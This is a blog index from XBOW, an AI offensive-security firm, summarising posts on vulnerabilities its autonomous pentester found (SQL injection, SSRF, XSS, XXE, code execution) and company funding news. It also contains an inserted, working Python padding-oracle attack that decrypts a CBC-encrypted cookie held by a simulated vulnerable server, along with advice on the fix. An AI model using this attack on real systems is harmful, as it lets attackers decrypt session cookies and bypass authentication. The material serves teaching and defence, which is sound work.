
Blog

Updates and opinions from the team

July 31, 2025  -  By Nico Waisman

The campaign is not available in your country: XBOW discovered an SQLi while attempting to bypass geolocation restrictions.

As much as an AI might get discouraged, it’s also incredibly relentless in its pursuit.

July 28, 2025  -  By Alvaro Muñoz

Another Byte Bites the Dust - How XBOW Turned a Blind SSRF into a File Reading Oracle

A complete arbitrary local file read vulnerability achieved through an ingenious byte-by-byte exfiltration technique.

July 24, 2025  -  By Alvaro Muñoz

Beyond the Bands: Exploiting TiTiler’s Expression Parser for Remote Code Execution

A methodical analysis of TiTiler's API endpoints and its expression parser, leading to arbitrary Python code execution on the server.

July 21, 2025  -  By Nico Waisman

How XBOW turned a JavaScript hint into a working file inclusion

The XBOW bug bounty effort continues, and this time it uncovered a critical local file inclusion vulnerability by transforming an intriguing SSRF into a full file read exploit.

July 17, 2025  -  By Albert Ziegler

Agents Built From Alloys

A simple, powerful innovation boosts performance in agentic AI systems.

July 14, 2025  -  By Alvaro Muñoz

XBOW battles Ninja Tables: Who’s the Real Ninja?

Sharing the story of how XBOW sniffed out a sneaky arbitrary file read bug in the popular WordPress Ninja Tables plugin.

July 10, 2025  -  By Javier Gil

When the Heat Gets to Your Database: A Refreshing SQL Injection Discovery in Z-Push

Summer's scorching heat is particularly brutal this season, making even the most seasoned pentesters dream of cool shade and refreshing drinks. But sometimes, when you're deep in the trenches of vulnerability research, you stumble upon something that's equally refreshing: a crisp, clean SQL injection vulnerability as good as an ice-cold beverage on a sweltering day.

July 7, 2025  -  By Diego Jurado

Finding XSS in Salesforce Aura Components: How XBOW Got Creative

How artificial intelligence discovered a widespread XSS vulnerability through methodical testing and creative parameter combinations.

June 30, 2025  -  By Diego Jurado

CVE-2025-49493: XML External Entity (XXE) Injection in Akamai CloudTest

When XBOW met Akamai: a walkthrough of discovering and exploiting an XML External Entity vulnerability (CVE-2025-49493) in a widely-deployed application.

June 24, 2025  -  By Nico Waisman

The road to Top 1: How XBOW did it

For the first time in bug bounty history, an autonomous penetration tester has reached the top spot on the US leaderboard.

June 24, 2025  -  By Oege de Moor

Taking the Top Hacker in the US to New Heights: XBOW Raises $75M Series B

XBOW has reached a critical milestone: our AI now rivals and surpasses top-tier human hackers.

June 24, 2025  -  By Alvaro Muñoz

Breaking the Shield: How XBOW Discovered Multiple XSS Vulnerabilities in Palo Alto’s GlobalProtect VPN

XBOW discovered multiple cross-site scripting (XSS) vulnerabilities in Palo Alto Networks’ GlobalProtect VPN web application.

December 20, 2024  -  By Nico Waisman

The Nightmare Before Christmas: An arbitrary file download on Zoo-Project

XBOW discovered an arbitrary file download vulnerability in the open-source WPS application Zoo-Project.

December 13, 2024  -  By Diego Jurado

Stored Cross-Site Scripting (XSS) in 2FAuth

XBOW discovered a Cross-Site Scripting (XSS) vulnerability in the open-source project, 2FAuth.

December 2, 2024  -  By Diego Jurado

LabsAI’s EDDI project path traversal

XBOW discovered a Path Traversal vulnerability in the open-source project, LabsAI’s EDDI.

November 22, 2024  -  By Nico Waisman

SSRF & URI validation bypass in 2FAuth

XBOW discovered a Server-Side Request Forgery (SSRF) vulnerability in the OTP preview feature of the open-source project, 2FAuth.

November 13, 2024  -  By Nico Waisman and Brendan Dolan-Gavitt

How XBOW found a Scoold authentication bypass

As we shift our focus from benchmarks to real world applications, we will be sharing some of the most interesting vulnerabilities XBOW has found in real-world, open-source targets. The first of these is an authentication bypass in Scoold, a popular open-source Q&A platform.

September 11, 2024  -  By Nico Waisman

XBOW validation benchmarks: show me the numbers!

XBOW is currently making 104 benchmarks available to the public. This allows other security products, tools, and researchers to use and explore these benchmarks.

August 5, 2024  -  By Oege de Moor

XBOW now matches the capabilities of a top human pentester

Five professional pentesters were asked to find and exploit the vulnerabilities in 104 realistic web security benchmarks. The most senior of them, with over twenty years of experience, solved 85% in 40 hours, while the others scored 59% or less. XBOW also scored 85%, doing so in 28 minutes. This illustrates how XBOW can boost offensive security teams, freeing them to focus on the most interesting and challenging parts of their job.

July 30, 2024  -  By Oege de Moor

Sequoia Capital leads $20M seed round in XBOW

XBOW scales offensive security through AI, boosting the work of pentesters, bug hunters and offensive security researchers. It autonomously solves 75% of web app security benchmarks. Sequoia Capital is leading a $20M seed round in XBOW.

July 17, 2024  -  By Brendan Dolan-Gavitt

Breaking Crypto with XBOW

When I taught Offensive Security at NYU, padding oracles were the hardest attack we covered in our two-week unit on breaking cryptography. So it shocked me when XBOW managed to successfully build an exploit for this vulnerability in one of our novel benchmarks “Bad Captcha”, using it to decrypt a cookie set by the server and bypass its authentication.

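
The padding-oracle attack the post above refers to, as an added worked example that is not part of the original post and is not XBOW's or the Bad Captcha benchmark's code. The server, its `user=<name>` cookie layout and its `padding_ok` response are constructed stand-ins; the block cipher is a keyed byte substitution that only stands in for AES so the example runs offline, and the attack relies on nothing but the CBC structure, so it works unchanged against a real cipher.

```python
"""Padding-oracle recovery of a CBC-encrypted cookie (added example)."""
import os
import random
from typing import Callable, Optional

BLOCK = 16


class ToyBlockCipher:
    """Bijective 16-byte block function. NOT a real cipher; stand-in for AES only."""

    def __init__(self, key: bytes):
        self.key = key
        rng = random.Random(key)
        self.sbox = list(range(256))
        rng.shuffle(self.sbox)
        self.inv = [0] * 256
        for i, v in enumerate(self.sbox):
            self.inv[v] = i

    def encrypt_block(self, block: bytes) -> bytes:
        return bytes(self.sbox[b ^ self.key[i]] for i, b in enumerate(block))

    def decrypt_block(self, block: bytes) -> bytes:
        return bytes(self.inv[b] ^ self.key[i] for i, b in enumerate(block))


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or len(data) % BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cbc_encrypt(cipher: ToyBlockCipher, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = cipher.encrypt_block(xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(cipher: ToyBlockCipher, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        cur = ct[i:i + BLOCK]
        out += xor(cipher.decrypt_block(cur), prev)
        prev = cur
    return out


class VulnerableServer:
    """Hypothetical server: cookie = IV || CBC(pad(b"user=<name>")). It leaks padding validity."""

    def __init__(self, key: Optional[bytes] = None):
        self.cipher = ToyBlockCipher(key or os.urandom(BLOCK))

    def issue_cookie(self, user: str) -> bytes:
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.cipher, iv, pkcs7_pad(b"user=" + user.encode()))

    def padding_ok(self, cookie: bytes) -> bool:
        # The oracle: a distinguishable response on bad padding (e.g. 500 vs 403).
        try:
            pkcs7_unpad(cbc_decrypt(self.cipher, cookie[:BLOCK], cookie[BLOCK:]))
            return True
        except ValueError:
            return False


def padding_oracle_decrypt(oracle: Callable[[bytes], bool], cookie: bytes) -> bytes:
    """Recover the plaintext of IV || C1 || ... || Cn using only the oracle, no key."""
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    plaintext = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(target), recovered right to left
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):  # force already-known bytes to the pad value
                forged[j] = inter[j] ^ pad
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):  # forged block plays the IV
                    continue
                if pos == BLOCK - 1:
                    # Rule out the \x02\x02 false positive on the last byte: a true
                    # \x01 still validates when the byte to its left is disturbed.
                    probe = bytearray(forged)
                    probe[pos - 1] ^= 0xFF
                    if not oracle(bytes(probe) + target):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("oracle accepted no value; not a padding oracle?")
        plaintext += xor(inter, prev)  # P_i = D_k(C_i) xor C_{i-1}
    return pkcs7_unpad(plaintext)


if __name__ == "__main__":
    server = VulnerableServer()
    print(padding_oracle_decrypt(server.padding_ok, server.issue_cookie("alice")))  # b'user=alice'
```

Each plaintext byte costs at most 256 oracle queries, about 4 KB of requests per 16-byte block, which is why a "bad padding" response that differs from "bad session" (by status code, body, or timing) is enough to strip the confidentiality of the whole cookie. The fix is not to hide the error but to authenticate the ciphertext (an AEAD mode, or encrypt-then-MAC with a constant-time tag check) before any decryption or padding check runs.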
July 15, 2024  -  By Oege de Moor

Introducing XBOW

XBOW brings AI to offensive security. Today we’re announcing the results of testing XBOW on hundreds of web security benchmarks. Without any human intervention, XBOW correctly finds and exploits the vulnerabilities in most of them.
